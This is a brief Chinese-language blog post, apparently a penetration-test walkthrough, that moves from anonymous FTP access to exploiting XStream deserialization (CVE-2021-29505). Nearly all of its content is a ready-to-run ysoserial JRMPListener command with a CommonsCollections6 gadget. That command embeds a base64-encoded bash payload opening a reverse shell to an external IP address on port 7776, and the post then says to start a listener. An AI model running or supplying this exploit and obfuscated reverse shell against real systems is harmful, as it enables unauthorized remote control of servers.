外网打点
信息搜集
FTP匿名登录
发现有FTP匿名登录,连接查看
漏洞探测
搜索Xstream
漏洞,发现
https://www.cnblogs.com/thelostworld/p/14810682.html
尝试CVE-2021-29505
反弹shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 “bash -c {echo,YmFzaCAtaSAmPiAvZGV2L3RjcC8xMTkuMy4yMTUuMTk4Lzc3NzYgMD4mMQ==}|{base64,-d}|{bash,-i}”
同时开启监听
© 版权声明
THE END
暂无评论内容